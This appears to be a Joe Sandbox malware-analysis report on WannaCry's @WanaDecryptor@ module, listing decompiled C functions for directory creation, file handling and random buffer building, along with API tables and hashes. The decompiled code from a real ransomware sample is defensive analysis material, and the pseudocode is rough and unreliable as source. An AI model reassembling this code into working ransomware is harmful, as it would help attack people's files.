                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0);
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                                      0x0040b6a8
                                                      0x0040b6b4
                                                      0x0040b6c1
                                                      0x0040b6ca
                                                      0x0040b6cf
                                                      0x0040b6d1
                                                      0x0040b6d6
                                                      0x0040b6f7
                                                      0x0040b6ff
                                                      0x0040b709
                                                      0x0040b70e
                                                      0x0040b712
                                                      0x0040b717
                                                      0x0040b726
                                                      0x0040b72a
                                                      0x0040b72c
                                                      0x0040b733
                                                      0x0040b74e
                                                      0x0040b75d
                                                      0x0040b762
                                                      0x0040b765
                                                      0x0040b766
                                                      0x0040b72c
                                                      0x0040b76b
                                                      0x0040b77f
                                                      0x0040b71c
                                                      0x0040b725
                                                      0x0040b725
                                                      0x0040b6d8
                                                      0x0040b6d9
                                                      0x0040b6eb
                                                      0x0040b6eb

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                                      0x0040d150
                                                      0x0040d159
                                                      0x0040d15b
                                                      0x0040d15d
                                                      0x0040d163
                                                      0x0040d168
                                                      0x0040d16b
                                                      0x0040d170
                                                      0x0040d176
                                                      0x0040d17a
                                                      0x0040d17f
                                                      0x0040d183
                                                      0x0040d185
                                                      0x0040d185
                                                      0x0040d18a
                                                      0x0040d18e
                                                      0x0040d192
                                                      0x0040d193
                                                      0x0040d185
                                                      0x0040d197
                                                      0x0040d19e
                                                      0x0040d1a4
                                                      0x0040d1a6
                                                      0x0040d1b7
                                                      0x0040d1b7
                                                      0x0040d1b9
                                                      0x0040d1bb
                                                      0x0040d1bc
                                                      0x0040d1c0
                                                      0x0040d1c7
                                                      0x0040d1d6
                                                      0x0040d1e1
                                                      0x0040d1e5
                                                      0x0040d1e9
                                                      0x0040d1ea
                                                      0x0040d1ef
                                                      0x0040d1f3
                                                      0x0040d1f8
                                                      0x0040d201
                                                      0x0040d215
                                                      0x0040d21a
                                                      0x0040d297
                                                      0x0040d2a1
                                                      0x0040d21c
                                                      0x0040d21f
                                                      0x0040d22a
                                                      0x0040d233
                                                      0x0040d234
                                                      0x0040d237
                                                      0x0040d244
                                                      0x0040d292
                                                      0x00000000
                                                      0x0040d24d
                                                      0x0040d24f
                                                      0x0040d282
                                                      0x0040d28b
                                                      0x0040d251
                                                      0x0040d257
                                                      0x0040d25d
                                                      0x0040d25e
                                                      0x0040d25f
                                                      0x0040d268
                                                      0x00000000
                                                      0x0040d26a
                                                      0x0040d27d
                                                      0x0040d27d
                                                      0x0040d268
                                                      0x0040d24f
                                                      0x0040d244

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1);
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}









                                                      0x004108a2
                                                      0x004108ab
                                                      0x004108c8
                                                      0x004108cc
                                                      0x004108ce
                                                      0x004108d3
                                                      0x004108d9
                                                      0x004108dd
                                                      0x00410915
                                                      0x00410919
                                                      0x00000000
                                                      0x004108df
                                                      0x004108e2
                                                      0x00410938
                                                      0x00410938
                                                      0x0041093a
                                                      0x00410945
                                                      0x00410947
                                                      0x00410980
                                                      0x00410985
                                                      0x00410988
                                                      0x0041098b
                                                      0x0041098e
                                                      0x00410992
                                                      0x00410999
                                                      0x004109a8
                                                      0x004109a8
                                                      0x004109b4
                                                      0x004109bb
                                                      0x0041094e
                                                      0x00410956
                                                      0x0041095d
                                                      0x00410962
                                                      0x00410965
                                                      0x00410969
                                                      0x0041096d
                                                      0x00410970
                                                      0x00410973
                                                      0x0041097b
                                                      0x0041097b
                                                      0x004108e4
                                                      0x00410901
                                                      0x00410906
                                                      0x00410920
                                                      0x00410925
                                                      0x0041092c
                                                      0x00410935
                                                      0x00000000
                                                      0x00410908
                                                      0x00410908
                                                      0x00410914
                                                      0x00410914
                                                      0x00410906
                                                      0x004108e2
                                                      0x004108b7
                                                      0x004108be
                                                      0x004108c7
                                                      0x004108c7

                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      • String ID:
                                                      • API String ID: 3407337251-0
                                                      • Opcode ID: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                                      • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                                      • Opcode Fuzzy Hash: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                                      • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32);
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520);
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						return CreateDirectoryA( &_v520, 0);
					}
				}
			}
























                                                      0x00412250
                                                      0x00412257
                                                      0x00412261
                                                      0x00412264
                                                      0x0041226d
                                                      0x00412272
                                                      0x00412272
                                                      0x0041226d
                                                      0x00412278
                                                      0x0041227f
                                                      0x00412284
                                                      0x0041235a
                                                      0x0041235a
                                                      0x0041228a
                                                      0x0041228a
                                                      0x0041228c
                                                      0x0041228e
                                                      0x00412291
                                                      0x00412298
                                                      0x00412298
                                                      0x0041229a
                                                      0x0041229d
                                                      0x0041229e
                                                      0x004122a6
                                                      0x004122aa
                                                      0x004122ac
                                                      0x004122b7
                                                      0x004122ba
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c3
                                                      0x004122d4
                                                      0x004122d9
                                                      0x004122d9
                                                      0x004122de
                                                      0x004122e3
                                                      0x004122f0
                                                      0x004122f2
                                                      0x004122f8
                                                      0x004122fc
                                                      0x00412306
                                                      0x00412306
                                                      0x00412306
                                                      0x00412306
                                                      0x00412313
                                                      0x00412315
                                                      0x00412319
                                                      0x0041231b
                                                      0x00412322
                                                      0x00412327
                                                      0x0041232a
                                                      0x00412336
                                                      0x00412338
                                                      0x00412343
                                                      0x00000000
                                                      0x00412345
                                                      0x00000000
                                                      0x0041234c
                                                      0x00412343

                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID:
                                                      • API String ID: 3401506121-0
                                                      • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                                      • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                                      0x00406a01
                                                      0x00406a0c
                                                      0x00406a10
                                                      0x00406a11
                                                      0x00406a12
                                                      0x00406a14
                                                      0x00406a15
                                                      0x00406a1d
                                                      0x00406ab7
                                                      0x00406ab7
                                                      0x00406a23
                                                      0x00406a23
                                                      0x00000000
                                                      0x00406a32
                                                      0x00406a35
                                                      0x00406a3a
                                                      0x00406a44
                                                      0x00406a70
                                                      0x00406a72
                                                      0x00406a79
                                                      0x00406a46
                                                      0x00406a48
                                                      0x00406a52
                                                      0x00000000
                                                      0x00406a54
                                                      0x00406a56
                                                      0x00406a60
                                                      0x00000000
                                                      0x00406a62
                                                      0x00406a64
                                                      0x00406a6b
                                                      0x00406a6b
                                                      0x00406a60
                                                      0x00406a52
                                                      0x00406a7c
                                                      0x00406a84
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a8c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a97
                                                      0x00406a98
                                                      0x00406a9a
                                                      0x00406aa5
                                                      0x00406ab0
                                                      0x00000000
                                                      0x00406ab0
                                                      0x00406aad
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a23
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      • String ID:
                                                      • API String ID: 2870283385-0
                                                      • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                                      • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                                      0x0040d0a9
                                                      0x0040d0ab
                                                      0x0040d0ad
                                                      0x0040d0b3
                                                      0x0040d0b8
                                                      0x0040d0bb
                                                      0x0040d0c0
                                                      0x0040d0c6
                                                      0x0040d0cc
                                                      0x0040d0d1
                                                      0x0040d0e1
                                                      0x0040d0ef
                                                      0x0040d0f3
                                                      0x0040d0f7
                                                      0x0040d0fb
                                                      0x0040d100
                                                      0x0040d101
                                                      0x0040d105
                                                      0x0040d110
                                                      0x0040d124
                                                      0x0040d129
                                                      0x0040d13d
                                                      0x0040d14d
                                                      0x0040d12d
                                                      0x0040d137
                                                      0x0040d137
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d0d3
                                                      0x0040d0d3
                                                      0x0040d0d8
                                                      0x0040d0dc
                                                      0x0040d0dd
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
